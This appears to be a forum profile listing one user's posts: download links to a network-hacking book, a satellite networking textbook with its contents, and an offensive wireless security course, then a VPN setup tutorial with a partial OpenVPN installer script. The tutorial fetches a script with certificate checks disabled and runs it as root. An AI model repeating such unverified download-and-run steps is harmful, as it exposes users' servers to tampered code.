Everything posted by Fi8sVrs
Understanding Network Hacks: Attack and Defense with Python
Author: Bastian Ballmann
Download: http://www.docdroid.net/rfpu/understanding-network-hacks.pdf.html
-
https://www.sendspace.com/file/x8wed8
-
SATELLITE NETWORKING: PRINCIPLES AND PROTOCOLS, SECOND EDITION
Author: Zhili Sun, University of Surrey, UK

Contents
List of Figures xix; List of Tables xxv; About the Author xxvii; Preface xxix; Acknowledgements xxxi

1 Introduction 1
1.1 Applications and Services of Satellite Networks 1; 1.1.1 Roles of Satellite Networks 2; 1.1.2 Network Software and Hardware 4; 1.1.3 Satellite Network Interfaces 4; 1.1.4 Network Services 5; 1.1.5 Applications 5
1.2 ITU-R Definitions of Satellite Services 5; 1.2.1 Fixed Satellite Service (FSS) 6; 1.2.2 Mobile Satellite Service (MSS) 6; 1.2.3 Broadcasting Satellite Service (BSS) 6; 1.2.4 Other Satellite Services 6
1.3 ITU-T Definitions of Network Services 6; 1.3.1 Interactive Services 7; 1.3.2 Distribution Services 7
1.4 Internet Services and Applications 8; 1.4.1 World Wide Web (WWW) 8; 1.4.2 File Transfer Protocol (FTP) 9; 1.4.3 Telnet 9; 1.4.4 Electronic Mail (email) 10; 1.4.5 Multicast and Content Distribution 10; 1.4.6 Voice over Internet Protocol (VoIP) 10; 1.4.7 Domain Name System (DNS) 11
1.5 Circuit-switching Network 11; 1.5.1 Connection Set Up 12; 1.5.2 Signalling 13; 1.5.3 Transmission Multiplexing Hierarchy based on FDM 13; 1.5.4 Transmission Multiplexing Hierarchy based on TDM 13; 1.5.5 Space Switching and Time Switching 15; 1.5.6 Coding Gain of Forward Error Correction (FEC) 16
1.6 Packet-switching Networks 17; 1.6.1 Connection-oriented Approach 18; 1.6.2 Connectionless Approach 19; 1.6.3 Relationship between Circuit-switching and Packet-switching 20; 1.6.4 Considerations of Packet Network Designs 20; 1.6.5 Packet Header and Payload 21; 1.6.6 Complexity and Heterogeneous Networks 21; 1.6.7 Performance of Packet Transmissions 21; 1.6.8 Impact of Bit Level Errors on Packet Level 22
1.7 OSI/ISO Reference Model 22; 1.7.1 Protocol Terminology 23; 1.7.2 Layering Principle 23; 1.7.3 Functions of the Seven Layers 23; 1.7.4 Fading of the OSI/ISO Reference Model 24
1.8 The ATM Protocol Reference Model 25; 1.8.1 Narrowband ISDN (N-ISDN) 25; 1.8.2 Broadband ISDN (B-ISDN) 25; 1.8.3 ATM Technology 25; 1.8.4 Reference Model 26; 1.8.5 Problems: Lack of Available Services and Applications 26
1.9 Internet Protocols Reference Model 27; 1.9.1 Network Layer: IP Protocol 27; 1.9.2 Network Technologies 27; 1.9.3 Transport Layer: TCP and UDP 28; 1.9.4 Application Layer 28; 1.9.5 QoS and Control on Resources 28
1.10 Satellite Network 28; 1.10.1 Access Network 29; 1.10.2 Transit Network 29; 1.10.3 Broadcast Network 29; 1.10.4 Space Segment 29; 1.10.5 Ground Segment 31; 1.10.6 Satellite Orbits 31; 1.10.7 Satellite Transmission Frequency Bands 32
1.11 Characteristics of Satellite Networks 34; 1.11.1 Propagation Delay 34; 1.11.2 Propagation Loss and Power Limited 35; 1.11.3 Orbit Space and Bandwidth Limited for Coverage 35; 1.11.4 Operational Complexity for LEO 35
1.12 Channel Capacity of Digital Transmissions 35; 1.12.1 The Nyquist Formula for Noiseless Channels 36; 1.12.2 The Shannon Theorem for Noise Channels 36; 1.12.3 Channel Capacity Boundary 36; 1.12.4 The Shannon Power Limit (-1.6 dB) 36; 1.12.5 Shannon Bandwidth Efficiency for Large Eb/N0 37
1.13 Internetworking with Terrestrial Networks 38; 1.13.1 Repeaters at the Physical Layer 38; 1.13.2 Bridges at the Link Layer 38; 1.13.3 Switches at the Physical, Link and Network Layers 39; 1.13.4 Routers for Interconnecting Heterogeneous Networks 39; 1.13.5 Protocol Translation, Stacking and Tunnelling 39; 1.13.6 Quality of Service (QoS) 40; 1.13.7 End-user QoS Class and Requirements 40; 1.13.8 Network Performance 41; 1.13.9 QoS and NP for Satellite Networking 42
1.14 Digital Video Broadcasting (DVB) 43; 1.14.1 The DVB Standards 44; 1.14.2 Transmission System 44; 1.14.3 Adaptation to Satellite Transponder Characteristics 45; 1.14.4 Channel Coding 46; 1.14.5 Reed-Solomon (RS) Outer Coding, Interleaving and Framing 47; 1.14.6 Inner Convolutional Coding 48; 1.14.7 Baseband Shaping and Modulation 49; 1.14.8 Error Performance Requirements 50
1.15 DVB-S Satellite Delivery 50; 1.15.1 MPEG-2 Baseband Processing 51; 1.15.2 Transport Stream (TS) 52; 1.15.3 Service Objectives 52; 1.15.4 Satellite Channel Adaptation 52; 1.15.5 DVB Return Channel over Satellite (DVB-RCS) 53; 1.15.6 TCP/IP over DVB 54
1.16 DVB Satellite Second Generation (DVB-S2) 54; 1.16.1 Technology Novelty in the DVB-S2 55; 1.16.2 Transmission System Architecture 56; 1.16.3 Error Performance 58
1.17 DVB Satellite Services to Handheld Devices (DVB-SH) 59; 1.17.1 Transmission System Architecture 60; 1.17.2 Common Functions for both TDM and OFDM Modes 61; 1.17.3 Functions for Single Carrier (TDM) Mode 62; 1.17.4 Functions for Multi Carrier (OFDM) Mode 65; 1.17.5 DVB-RCS2 69
1.18 Historical Development of Computer and Data Networks 69; 1.18.1 Dawn of the Computer and Data Communications Age 70; 1.18.2 Development of Local Area Networks (LANs) 70; 1.18.3 Development of WANs and ISO/OSI 70; 1.18.4 Birth of the Internet 70; 1.18.5 Integration of Telephony and Data Networks 70; 1.18.6 Development of Broadband Integrated Networks 71; 1.18.7 The Killer Application WWW and Internet Evolutions 71
1.19 Historical Development of Satellite Communications 71; 1.19.1 Start of Satellite and Space Eras 71; 1.19.2 Early Satellite Communications: TV and Telephony 72; 1.19.3 Development of Satellite Digital Transmission 72; 1.19.4 Development of Direct-to-Home (DTH) Broadcast 72; 1.19.5 Development of Satellite Maritime Communications 72; 1.19.6 Satellite Communications in Regions and Countries 72; 1.19.7 Satellite Broadband Networks and Mobile Networks 73; 1.19.8 Internet over Satellite Networks 73
1.20 Convergence of Network Technologies and Protocols 73; 1.20.1 Convergence of Services and Applications in User Terminals 73; 1.20.2 Convergence of Network Technologies 74; 1.20.3 Convergence of Network Protocols 75; 1.20.4 Satellite Network Evolution 75
Further Readings 77; Exercises 78

2 Satellite Orbits and Networking Concepts 79
2.1 Laws of Physics 80; 2.1.1 Kepler's Three Laws 80; 2.1.2 Newton's Three Laws of Motion and The Universal Law of Gravity 80; 2.1.3 Kepler's First Law: Satellite Orbits 81; 2.1.4 Kepler's Second Law: Area Swept by a Satellite Vector 83; 2.1.5 Kepler's Third Law: Orbit Period 83; 2.1.6 Satellite Velocity 84
2.2 Satellite Orbit Parameters 85; 2.2.1 Semi-Major Axis (a) 85; 2.2.2 Eccentricity (e) 85; 2.2.3 Inclination of Orbit (i) 85; 2.2.4 Right Ascension of the Node (Ω) and Argument of Perigee (ω) 86
2.3 Useful Orbits 87; 2.3.1 Geosynchronous Earth Orbits 87; 2.3.2 Geostationary Earth Orbits (GEOs) 87; 2.3.3 High Elliptical Orbits (HEOs) 88; 2.3.4 Notations of Low Earth Orbit (LEO) Satellite Constellations 88; 2.3.5 Orbital Perturbations 89; 2.3.6 Satellite Altitude and Coverage 89; 2.3.7 Antenna Gain and Beam-width Angle 90; 2.3.8 Coverage Calculations 91; 2.3.9 Distance and Propagation Delay from Earth Station to Satellite 92
2.4 Satellite Link Characteristics and Modulations for Transmissions 93; 2.4.1 Satellite Link Characteristics 93; 2.4.2 Modulation Techniques 95; 2.4.3 Phase Shift Keying (PSK) Schemes for Satellite Transmissions 96; 2.4.4 Binary Phase Shift Keying (BPSK) 96; 2.4.5 Quadrature PSK (QPSK) 97; 2.4.6 Gaussian-filtered Minimum Shift Keying (GMSK) 97; 2.4.7 Bit Error Rate (BER): the Quality Parameter of Modulation Schemes 98; 2.4.8 Satellite Networking in the Physical Layer 100
2.5 Forward Error Correction (FEC) 101; 2.5.1 Linear Block Codes 101; 2.5.2 Cyclic Codes 102; 2.5.3 Trellis Coding and Convolutional Codes 102; 2.5.4 Concatenated Codes 103; 2.5.5 Turbo Codes 103; 2.5.6 Performance of FEC 104
2.6 Multiple Access Techniques 105; 2.6.1 Frequency Division Multiple Access (FDMA) 106; 2.6.2 Time Division Multiple Access (TDMA) 106; 2.6.3 Code Division Multiple Access (CDMA) 107; 2.6.4 Comparison of FDMA, TDMA and CDMA 108
2.7 Bandwidth Allocation 108; 2.7.1 Fixed Assignment Access 109; 2.7.2 Demand Assignment 109; 2.7.3 Random Access 109
2.8 Satellite Networking Issues 110; 2.8.1 Single-hop Satellite Connections 110; 2.8.2 Multi-hop Satellite Connections 110; 2.8.3 Inter-satellite Links (ISL) 111; 2.8.4 Handovers 112; 2.8.5 Satellite Intra-beam and Inter-beam Handovers 114; 2.8.6 Earth Fixed Coverage versus Satellite Fixed Coverage 114; 2.8.7 Routing within a Constellation of Satellite Networks 115; 2.8.8 Internetworking 116; 2.8.9 Satellite Availability and Diversity 116
Further Readings 118; Exercises 118

3 B-ISDN ATM and Internet Protocols 119
3.1 ATM Protocol and Fundamental Concepts 119; 3.1.1 Packetisation Delay 121; 3.1.2 Queuing Delay 121; 3.1.3 Compromise Solution Between North America and Europe 122
3.2 ATM Layer 123; 3.2.1 The GFC Field 123; 3.2.2 The VPI and VCI Fields 123; 3.2.3 The CLP Field 125; 3.2.4 The PT Field 126; 3.2.5 The HEC Field 126
3.3 ATM Adaptation Layer (AAL) 126; 3.3.1 AAL1 for Class A 127; 3.3.2 AAL2 for Class B 129; 3.3.3 AAL3/4 for Classes C and D 129; 3.3.4 AAL5 for Internet Protocol 130
3.4 The Physical Layer 131; 3.4.1 The Physical Medium (PM) Sublayers 131; 3.4.2 The Transmission Convergence (TC) Sublayer 131; 3.4.3 ATM Cell Transmissions 132
3.5 ATM Interfaces and ATM Networking 134; 3.5.1 User-Network Access 134; 3.5.2 Network Node Interconnections 135; 3.5.3 ATM DXI 136; 3.5.4 B-ICI 136; 3.5.5 Permanent Virtual Connections versus Switched Virtual Connections 136; 3.5.6 ATM Signalling 137; 3.5.7 ATM Addressing 137; 3.5.8 Address Registration 139
3.6 Network Traffic, QoS and Performance Issues 139; 3.6.1 Traffic Descriptors 140; 3.6.2 QoS Parameters 140; 3.6.3 Performance Issues 140
3.7 Network Resource Management 141; 3.7.1 Connection Admission Control (CAC) 142; 3.7.2 UPC and NPC 142; 3.7.3 Priority Control and Congestion Control 142; 3.7.4 Traffic Shaping 143; 3.7.5 Generic Cell Rate Algorithm (GCRA) 143; 3.7.6 Leaky Bucket Algorithm (LBA) 143; 3.7.7 Virtual Scheduling Algorithm (VSA) 146
3.8 Internet Protocols 146; 3.8.1 Internet Networking Basics 147; 3.8.2 Protocol Hierarchies 147; 3.8.3 Connectionless Network Layer 148; 3.8.4 The IP Packet Format 148; 3.8.5 IP Address 150; 3.8.6 Mapping Between Internet and Physical Network Addresses 151; 3.8.7 ARP, RARP and HDCP 152
3.9 Internet Routing Protocols 152; 3.9.1 The Interior Gateway Routing Protocol (IGRP) 152; 3.9.2 The Exterior Gateway Routing Protocol (EGRP) 153
3.10 Transport Layer Protocols: TCP and UDP 153; 3.10.1 Transmission Control Protocol (TCP) 153; 3.10.2 The TCP Segment Header Format 154; 3.10.3 Connection Set Up and Data Transmission 155; 3.10.4 Congestion and Flow Control 156; 3.10.5 User Datagram Protocol (UDP) 157
3.11 IP and ATM Internetworking 158; 3.11.1 Packet Encapsulation 159; 3.11.2 IP and ATM Address Resolution 160
Further Readings 161; Exercises 161

4 Satellite Internetworking with Terrestrial Networks 163
4.1 Networking Concepts 163
4.2 Networking Terminology 165; 4.2.1 Private Network 165; 4.2.2 Public Network 165; 4.2.3 Quality Aspects of Telephony Services 166; 4.2.4 IP Based Network 166
4.3 Network Elements and Connections 167; 4.3.1 Network Terminals 167; 4.3.2 Network Nodes 168; 4.3.3 Network Connections 168; 4.3.4 End-to-End Paths 169; 4.3.5 Reference Configurations 169
4.4 Network Traffic and Signalling 170; 4.4.1 User Traffic and Network Services 170; 4.4.2 Signalling Systems and Signalling Traffic 171; 4.4.3 In-band Signalling 172; 4.4.4 Out-of-Band Signalling 173; 4.4.5 Associated and Disassociated Channel Signalling 173; 4.4.6 Network Management 174; 4.4.7 Network Operation Systems and Mediation Functions 175
4.5 Access and Transit Transmission Networks 176; 4.5.1 Analogue Telephony Networks 177; 4.5.2 Telephony Network Traffic Engineering Concept 177; 4.5.3 Access to Satellite Networks in the Frequency Domain 178; 4.5.4 On-Board Circuit Switching 179
4.6 Digital Telephony Networks 180; 4.6.1 Digital Multiplexing Hierarchy 180; 4.6.2 Satellite Digital Transmission and On-Board Switching 181; 4.6.3 Plesiochronous Digital Hierarchy (PDH) 181; 4.6.4 Limitations of PDH 181
4.7 Synchronous Digital Hierarchy (SDH) 182; 4.7.1 Development of SDH 183; 4.7.2 The SDH Standards 183; 4.7.3 Mapping from PDH to SDH 184; 4.7.4 The Benefits of SDH 185; 4.7.5 Synchronous Operation 185; 4.7.6 Synchronous Optical Network (SONET) 187; 4.7.7 SDH Over Satellite: The Intelsat Scenarios 188
4.8 Hypothetical References for Satellite Networks 189; 4.8.1 ITU-T Hypothetical Reference Connection (HRX) 189; 4.8.2 ITU-R Hypothetical Reference Digital Path (HRDP) for Satellite 190; 4.8.3 Performance Objectives 191
4.9 Satellites and MANET 191; 4.9.1 Networking Scenarios 193
4.10 Interworking with Heterogeneous Networks 197; 4.10.1 Services 197; 4.10.2 Addressing 198; 4.10.3 Routing 198; 4.10.4 Evolution 198
Further Readings 199; Exercises 200

5 B-ISDN ATM over Satellite Networks 201
5.1 Background 201; 5.1.1 Networking Issues 202; 5.1.2 Satellite Services in the B-ISDN Networking Environment 202
5.2 Design Issues of Satellite B-ISDN ATM Systems 204; 5.2.1 Propagation Delay 204; 5.2.2 Attenuation and Constraints 205
5.3 The GEO Satellite B-ISDN ATM Networking Architecture 206; 5.3.1 Ground Segment 206; 5.3.2 Space Segment 207; 5.3.3 Satellite Bandwidth Resource Management 207; 5.3.4 Connection Admission Control (CAC) 209; 5.3.5 Network Policing Functions 209; 5.3.6 Reactive Congestion Control 209
5.4 Advanced Satellite B-ISDN ATM Networks 210; 5.4.1 Radio Access Layer 210; 5.4.2 On-Board Processing (OBP) Characteristics 211; 5.4.3 B-ISDN ATM On-Board Switch 211; 5.4.4 Multibeam Satellites 214; 5.4.5 LEO/MEO Satellite Constellations 215; 5.4.6 Inter-Satellite Links (ISL) 215; 5.4.7 Mobility Management 216; 5.4.8 Use of Higher Frequency Spectrum 216
5.5 B-ISDN ATM Performance 217; 5.5.1 Layered Model of Performance for B-ISDN 217; 5.5.2 Network Performance Parameters 218; 5.5.3 Impact of Satellite Burst Errors on the ATM Layer 220; 5.5.4 Impact of Burst Errors on AAL Protocols 221; 5.5.5 Error Control Mechanisms 221; 5.5.6 Enhancement Techniques for Broadband Satellite Networks 222
5.6 Evolution of Broadband Satellite Systems 224
Further Readings 225; Exercises 225

6 Internet Protocol (IP) over Satellite Networks 227
6.1 Different Viewpoints of Satellite Networking 227; 6.1.1 Protocol-centric Viewpoint of Satellite IP Network 228; 6.1.2 Satellite-centric Viewpoint of Global Networks and the Internet 229; 6.1.3 Network-centric Viewpoint of Satellite Networks 230
6.2 IP Packet Encapsulation 231; 6.2.1 Basic Concepts 231; 6.2.2 High-level Data Link Control (HDLC) Protocol 232; 6.2.3 Point-to-Point Protocol (PPP) 232; 6.2.4 Media Access Control 233; 6.2.5 IP Over Satellite 233
6.3 Satellite IP Networking 233; 6.3.1 Routing On-Board Satellites 235; 6.3.2 IP Mobility in Satellite Networks 235; 6.3.3 Address Resolution 237
6.4 IP Multicast Over Satellite 237; 6.4.1 IP Multicast Concepts 238; 6.4.2 IP Multicast Addressing 239; 6.4.3 Multicast Group Management 239; 6.4.4 IP Multicast Routing 240; 6.4.5 IP Multicast Scope 241; 6.4.6 IGMP Behaviour in Satellite Environments 241; 6.4.7 Multicast Routing Protocols in Satellite Environments 243; 6.4.8 Reliable Multicast Protocols Over Satellites 243
6.5 Basic Network Security Mechanisms 245; 6.5.1 Security Approaches 245; 6.5.2 Single-direction Hashing Functions 246; 6.5.3 Symmetrical Codes (With Secret Keys) 246; 6.5.4 Asymmetrical Codes (With Public/Private Keys) 247
6.6 Satellite Networking Security 248; 6.6.1 IP Security (IPsec) 248; 6.6.2 Firewall and VPN 249; 6.6.3 IP Multicast Security 250
6.7 Internet Quality of Service (IP QoS) 250; 6.7.1 Layered Model of Performance for IP Service 251; 6.7.2 IP Packet Transfer Performance Parameters 252; 6.7.3 IP Network Performance Objectives for QoS Classes 253; 6.7.4 Guidance on IP QoS Class Usage 254
6.8 Integrated Services (Intserv) Architectures for QoS 254; 6.8.1 Integrated Services Architecture (ISA) Principles 255; 6.8.2 Resource Reservation Protocol (RSVP) 256; 6.8.3 Intserv Service Classes 257
6.9 Differentiated Services (Diffserv) for QoS 258; 6.9.1 Diffserv Architecture 258; 6.9.2 Traffic Classification 260; 6.9.3 Traffic Conditioning 261; 6.9.4 Diffserv Per Hop Behaviour (PHB) 261; 6.9.5 Supporting Intserv Across the Satellite Network Diffserv Domain 263
6.10 DVB Over Satellite 264; 6.10.1 MPEG-2 Source Coding and Multiplexing DVB-S Streams 265; 6.10.2 DVB-S System 266; 6.10.3 DVB Security 268; 6.10.4 Conditional Access in DVB-S 268; 6.10.5 DVB-RCS Interactive Service and IP over DVB 270; 6.10.6 DVB-RCS Security 271; 6.10.7 IP Multicast Security 271
6.11 DVB-S and DVB-RCS Network Architecture 272; 6.11.1 On-Board Processor (OBP) 273; 6.11.2 Management Station (MS) 274; 6.11.3 Regenerative Satellite Gateway (RSGW) 274; 6.11.4 Return Channel Satellite Terminal (RCST) 275; 6.11.5 Network Interface 275; 6.11.6 Network System Characteristics 276
6.12 Network Protocol Stack Architecture 276
6.13 The Physical Layer (PHY) 277; 6.13.1 Up-link (DVB-RCS Compliant) 277; 6.13.2 Time Slots 278; 6.13.3 Frames 278; 6.13.4 Superframes 280; 6.13.5 Carrier Type and Frame Composition 280; 6.13.6 Uplink MF-TDMA Channel Frequency Plan 281; 6.13.7 Downlink (DVB-S Compliant) 282; 6.13.8 RCS Terminal (RCST) Transmission 283
6.14 Satellite MAC (SMAC) Layer 284; 6.14.1 Transport Mechanisms 284; 6.14.2 MPEG-2, DVB-S and DVB-RCS Tables 285
6.15 Multi Protocol Encapsulation (MPE) 288
6.16 Satellite Link Control Layer 290; 6.16.1 Session Control 290; 6.16.2 Resource Control 293; 6.16.3 Capacity Request Categories 294; 6.16.4 Connection Control 294
6.17 Quality of Service (QoS) 297; 6.17.1 Traffic Classes 297; 6.17.2 Flow Classification 298; 6.17.3 Link Layer Connection QoS Adaptation 298
6.18 Network Layer 299; 6.18.1 IP Routing and Address Resolution 299; 6.18.2 IP Multicast Star and Mesh Configurations 301
Further Readings 303; Exercises 305

7 Impact of Satellite Networks on Transport Layer Protocols 307
7.1 Introduction 308; 7.1.1 Application Characteristics 308; 7.1.2 Client and Server Host Parameters 309; 7.1.3 Satellite Network Configurations 309; 7.1.4 TCP and Satellite Channel Characteristics 310; 7.1.5 TCP Flow Control, Congestion Control and Error Recovery 311
7.2 TCP Performance Analysis 313; 7.2.1 First TCP Segment Transmission 313; 7.2.2 TCP Transmission in the Slow-start Stage 314; 7.2.3 TCP Transmission in the Congestion Avoidance Stage 314
7.3 Slow-start Enhancement for Satellite Networks 315; 7.3.1 TCP for Transactions 316; 7.3.2 Slow-start and Delayed Acknowledgement (ACK) 316; 7.3.3 Larger Initial Window 317; 7.3.4 Terminating Slow-start 317
7.4 Loss Recovery Enhancement 318; 7.4.1 Fast Retransmission and Fast Recovery 318; 7.4.2 Selective Acknowledgement (SACK) 319; 7.4.3 SACK Based Enhancement Mechanisms 319; 7.4.4 ACK Congestion Control 320; 7.4.5 ACK Filtering 320; 7.4.6 Explicit Congestion Notification 321; 7.4.7 Detecting Corruption Loss 322; 7.4.8 Congestion Avoidance Enhancement Policy 322
7.5 Enhancements for Satellite Networks Using Interruptive Mechanisms 323; 7.5.1 TCP Spoofing 323; 7.5.2 Cascading TCP or Split TCP 324; 7.5.3 Other Considerations for Satellite Networking 325
7.6 Impacts on Applications 325; 7.6.1 Bulk Data Transfer 325; 7.6.2 Interactive Applications 326; 7.6.3 Distributed Caching for Internet Services and Applications 326; 7.6.4 Web Caching in Satellite Networks 327
7.7 Real-time Transport Protocol (RTP) 328; 7.7.1 Basics of RTP 328; 7.7.2 RTP Control Protocol (RTCP) 331; 7.7.3 Sender Report (SR) Packets 332; 7.7.4 Receiver Report (RR) Packets 333; 7.7.5 Source Description (SDES) RTCP Packet 333; 7.7.6 SAP and SIP Protocols for Session Initiations 334; 7.7.7 Session Directory Service (SDS) 336
7.8 Voice over IP 336; 7.8.1 Gateway Decomposition 336; 7.8.2 Protocols 336; 7.8.3 Gatekeepers 337; 7.8.4 Multimedia Conferencing (MMC) 337; 7.8.5 Conference Control 337
Further Readings 337; Exercises 338

8 Next Generation Internet (NGI) over Satellite 341
8.1 Introduction 342
8.2 New Services and Applications 342; 8.2.1 Internet Integrated Services 343; 8.2.2 Elastic and Inelastic Traffic 343; 8.2.3 QoS Provision and Network Performance 344
8.3 Traffic Modelling and Characterisation 344; 8.3.1 Traffic Engineering Techniques 345; 8.3.2 Traffic Modelling 345; 8.3.3 Statistical Methods for Traffic Modelling 346; 8.3.4 Renewal Models 346; 8.3.5 Markov Models 346; 8.3.6 Fluid Models 347; 8.3.7 Auto-regressive and Moving Average Models 347; 8.3.8 Self-similar Models 348
8.4 The Nature of Internet Traffic 348; 8.4.1 World Wide Web (WWW) 348; 8.4.2 Pareto Distribution Model for Self-similar Traffic 350; 8.4.3 Fractional Brownian Motion (FBM) Process 350; 8.4.4 Consideration of User Behaviour in Traffic Modelling 351; 8.4.5 Voice Traffic Modelling 352; 8.4.6 On-off Model for Voice Traffic 354; 8.4.7 Video Traffic Modelling 355; 8.4.8 Multi-layer Modelling for WWW Traffic 356
8.5 Traffic Engineering 357; 8.5.1 Traffic Engineering Principles 358; 8.5.2 Internet Traffic Engineering 360
8.6 Multi-protocol Label Switching (MPLS) 361; 8.6.1 MPLS Forwarding Paradigm 362; 8.6.2 MPLS Basic Operation 363; 8.6.3 MPLS and Diffserv Interworking 366; 8.6.4 MPLS and ATM Interworking 367; 8.6.5 MPLS with Traffic Engineering (MPLS-TE) 368
8.7 Internet Protocol Version 6 (IPv6) 369; 8.7.1 Basics of Internet Protocol Version 6 (IPv6) 369; 8.7.2 IPv6 Addressing 371; 8.7.3 IPv6 Networks over Satellites 374; 8.7.4 IPv6 Transitions 375; 8.7.5 IPv6 Tunnelling Through Satellite Networks 375; 8.7.6 The 6to4 Translation via Satellite Networks 376; 8.7.7 Issues with 6to4 377; 8.7.8 Future Development of Satellite Networking 378
Further Readings 380; Exercises 381
Index 383

Download: http://www68.zippyshare.com/v/XtssMyns/file.html
-
The wireless industry continues to grow in leaps and bounds with more and more gadgets evolving to be wireless. Wireless access points, media centers, phones, and even security systems are commonplace in the average household. Unfortunately, the security that is implemented on this equipment is often lacking, opening the devices to severe security vulnerabilities. In practice, many companies and organizations still use and deploy vulnerable wireless gear, often in their default configurations. This is most often due to poor security awareness or a lack of understanding of the risks and ramifications.
Download: https://www.dropbox.com/s/bi60f383g4phbuu/Offensive%20Security%20Wireless%20Attacks%20-%20WiFu%20v3.0.7z?dl=0
pwd: rstforums.com
-
If you had put them in a .txt file or encrypted them it would have been even better, because the passwords get indexed by Google.
-
There are many ways you can go about creating your own Virtual Private Network. Let’s do the easiest one in this tutorial which will be how to use your VPS as your own VPN for your main machines connection. – ro0ted What’s used in this tutorial? Digital Oceans Cloud Debian Server VPS Putty AIO Open Puttygen>Click Generate>move your mouse around the blank space. Then copy the public key to the clipboard, save the public/private key Go to digital ocean control panel click SSH Keys. Copy n paste the public key from Puttygen to Control Panel. Now open Putty. Now once you are in Auth, In RLogin enter Root. Now you can connect to your server without ever entering a key. Minimize this window go to Create Droplet to make your server. Edit yours how you want just make sure you don’t enable Ipv6. Debian is more stable than all of them. Click SSH Key before clicking create droplet. Then go to droplets left side menu. Copy n paste ip in droplets to your putty. Click open. Should work flawlessly. If it does ask for a pass phrase ex: Passphrase for RSA-Key”” that means you put phrase in puttygen. If it says password for root, you did something wrong. If you can set this VPN Server up through this tutorial then just throw your computer away because this is an Automatic Installation for you. There’s really nothing to explain. This script does everything for you. Is it the safest way? Probably not but the more IMPORTANT question should be who do you trust more with your logs? Once signed in. type: sudo apt-get dist-upgrade sudo apt-get upgrade sudo apt-get update wget http://git.io/vpn –no-check-certificate -O openvpn-install.sh; chmod +x openvpn-install.sh; mirror: #!/bin/bash# OpenVPN road warrior installer for Debian-based distros # This script will only work on Debian-based systems. It isn't bulletproof but # it will probably work if you simply want to setup a VPN on your Debian/Ubuntu # VPS. It has been designed to be as unobtrusive and universal as possible. 
if [[ "$USER" != 'root' ]]; then echo "Sorry, you need to run this as root" exit fi if [[ ! -e /dev/net/tun ]]; then echo "TUN/TAP is not available" exit fi if [[ ! -e /etc/debian_version ]]; then echo "Looks like you aren't running this installer on a Debian-based system" exit fi newclient () { # Generates the client.ovpn cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/$1.ovpn sed -i "/ca ca.crt/d" ~/$1.ovpn sed -i "/cert client.crt/d" ~/$1.ovpn sed -i "/key client.key/d" ~/$1.ovpn echo "<ca>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/ca.crt >> ~/$1.ovpn echo "</ca>" >> ~/$1.ovpn echo "<cert>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/$1.crt >> ~/$1.ovpn echo "</cert>" >> ~/$1.ovpn echo "<key>" >> ~/$1.ovpn cat /etc/openvpn/easy-rsa/2.0/keys/$1.key >> ~/$1.ovpn echo "</key>" >> ~/$1.ovpn } # Try to get our IP from the system and fallback to the Internet. # I do this to make the script compatible with NATed servers (lowendspirit.com) # and to avoid getting an IPv6. IP=$(ifconfig | grep 'inet addr:' | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | cut -d: -f2 | awk '{ print $1}' | head -1) if [[ "$IP" = "" ]]; then IP=$(wget -qO- ipv4.icanhazip.com) fi if [[ -e /etc/openvpn/server.conf ]]; then while : do clear echo "Looks like OpenVPN is already installed" echo "What do you want to do?" 
echo "" echo "1) Add a cert for a new user" echo "2) Revoke existing user cert" echo "3) Remove OpenVPN" echo "4) Exit" echo "" read -p "Select an option [1-4]: " option case $option in 1) echo "" echo "Tell me a name for the client cert" echo "Please, use one word only, no special characters" read -p "Client name: " -e -i client CLIENT cd /etc/openvpn/easy-rsa/2.0/ source ./vars # build-key for the client export KEY_CN="$CLIENT" export EASY_RSA="${EASY_RSA:-.}" "$EASY_RSA/pkitool" $CLIENT # Generate the client.ovpn newclient "$CLIENT" echo "" echo "Client $CLIENT added, certs available at ~/$CLIENT.ovpn" exit ;; 2) echo "" echo "Tell me the existing client name" read -p "Client name: " -e -i client CLIENT cd /etc/openvpn/easy-rsa/2.0/ . /etc/openvpn/easy-rsa/2.0/vars . /etc/openvpn/easy-rsa/2.0/revoke-full $CLIENT # If it's the first time revoking a cert, we need to add the crl-verify line if grep -q "crl-verify" "/etc/openvpn/server.conf"; then echo "" echo "Certificate for client $CLIENT revoked" else echo "crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem" >> "/etc/openvpn/server.conf" /etc/init.d/openvpn restart echo "" echo "Certificate for client $CLIENT revoked" fi exit ;; 3) apt-get remove --purge -y openvpn openvpn-blacklist rm -rf /etc/openvpn rm -rf /usr/share/doc/openvpn sed -i '/--dport 53 -j REDIRECT --to-port/d' /etc/rc.local sed -i '/iptables -t nat -A POSTROUTING -s 10.8.0.0/d' /etc/rc.local echo "" echo "OpenVPN removed!" exit ;; 4) exit;; esac done else clear echo 'Welcome to this quick OpenVPN "road warrior" installer' echo "" # OpenVPN setup and first user creation echo "I need to ask you a few questions before starting the setup" echo "You can leave the default options and just press enter if you are ok with them" echo "" echo "First I need to know the IPv4 address of the network interface you want OpenVPN" echo "listening to." read -p "IP address: " -e -i $IP IP echo "" echo "What port do you want for OpenVPN?" 
read -p "Port: " -e -i 1194 PORT echo "" echo "Do you want OpenVPN to be available at port 53 too?" echo "This can be useful to connect under restrictive networks" read -p "Listen at port 53 [y/n]: " -e -i n ALTPORT echo "" echo "Do you want to enable internal networking for the VPN?" echo "This can allow VPN clients to communicate between them" read -p "Allow internal networking [y/n]: " -e -i n INTERNALNETWORK echo "" echo "What DNS do you want to use with the VPN?" echo " 1) Current system resolvers" echo " 2) OpenDNS" echo " 3) Level 3" echo " 4) NTT" echo " 5) Hurricane Electric" echo " 6) Yandex" read -p "DNS [1-6]: " -e -i 1 DNS echo "" echo "Finally, tell me your name for the client cert" echo "Please, use one word only, no special characters" read -p "Client name: " -e -i client CLIENT echo "" echo "Okay, that was all I needed. We are ready to setup your OpenVPN server now" read -n1 -r -p "Press any key to continue..." apt-get update apt-get install openvpn iptables openssl -y cp -R /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn # easy-rsa isn't available by default for Debian Jessie and newer if [[ ! -d /etc/openvpn/easy-rsa/2.0/ ]]; then wget --no-check-certificate -O ~/easy-rsa.tar.gz https://github.com/OpenVPN/easy-rsa/archive/2.2.2.tar.gz tar xzf ~/easy-rsa.tar.gz -C ~/ mkdir -p /etc/openvpn/easy-rsa/2.0/ cp ~/easy-rsa-2.2.2/easy-rsa/2.0/* /etc/openvpn/easy-rsa/2.0/ rm -rf ~/easy-rsa-2.2.2 rm 